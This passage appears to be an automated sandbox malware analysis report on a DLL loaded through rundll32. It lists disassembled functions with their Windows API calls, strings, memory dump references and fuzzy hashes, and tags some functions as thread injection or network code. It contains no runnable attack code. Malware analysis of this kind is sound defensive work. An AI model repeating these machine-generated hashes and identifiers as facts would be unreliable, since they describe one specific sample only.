                                                                                                                      • API String ID: 808654186-3887548279
                                                                                                                      • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                      • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                      • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                      • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100161C0 Relevance: 18.1, APIs: 12, Instructions: 91synchronizationthreadinjectionCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 100161DE
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                      • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                      • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3191170017-0
                                                                                                                      • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                      • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                      • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                      • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014538 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                      • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                      • API String ID: 667068680-3617302793
                                                                                                                      • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                      • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                      • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                      • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001736E Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                      • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                      • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                      • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                      • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                      • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                        • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1509511306-0
                                                                                                                      • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                      • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                      • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                      • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001C7D1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                      • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                        • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                        • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                      • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                      • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                      • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                      • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                        • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                      • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                      • String ID: AfxOldWndProc423
                                                                                                                      • API String ID: 2702501687-1060338832
                                                                                                                      • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                      • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                      • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                      • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10012E90 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 81networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                      • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                      • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                      • _printf.LIBCMT ref: 10012F79
                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                      • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                      • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                      • API String ID: 4222005279-2156106531
                                                                                                                      • Opcode ID: d6930e6a1fc45b4748102b9b6de5cc36bf5b45ad8e48198316e22918239c4344
                                                                                                                      • Instruction ID: 5c8f7e15fc6d9e06ebf4fa262ac9747ef485c43692dc612ad86c8b01a400670e
                                                                                                                      • Opcode Fuzzy Hash: d6930e6a1fc45b4748102b9b6de5cc36bf5b45ad8e48198316e22918239c4344
                                                                                                                      • Instruction Fuzzy Hash: B6317374A85218DBE724DB90CD56FD9B3B1EF49300F1041E8E509AA2C1DB72E9D18F55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100351B5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                      • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                      • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                      • __lock.LIBCMT ref: 10035229
                                                                                                                      • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                      • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                      • API String ID: 1036688887-2843748187
                                                                                                                      • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                      • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                      • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                      • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001717E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                      • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                      • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                      • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                      • String ID: MS Shell Dlg
                                                                                                                      • API String ID: 1736106359-76309092
                                                                                                                      • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                      • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                      • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                      • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021ED7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                      • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                      • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                      • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 46613423-3470857405
                                                                                                                      • Opcode ID: 61213e6980dcb3cb65d4e1bccbb3a8eece8a9d69db6aa345a8d68dd3f9e52f8f
                                                                                                                      • Instruction ID: 42bba0fd7f26ad83684da700c29fa1b9b4104b8155991441c2ce65153df76cb7
                                                                                                                      • Opcode Fuzzy Hash: 61213e6980dcb3cb65d4e1bccbb3a8eece8a9d69db6aa345a8d68dd3f9e52f8f
                                                                                                                      • Instruction Fuzzy Hash: A5119175640268EBEB10DBA0DE85FEF77B8EF1A781F800025FA05E6181EB709D05CB65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100209ED Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                      • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                      • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1891723912-0
                                                                                                                      • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                      • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                      • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                      • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10025BA5 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                        • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                        • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                      • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                      • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                      • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                      • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 317715441-0
                                                                                                                      • Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                      • Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
                                                                                                                      • Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                      • Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014A22 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                      • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                        • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                        • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                        • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
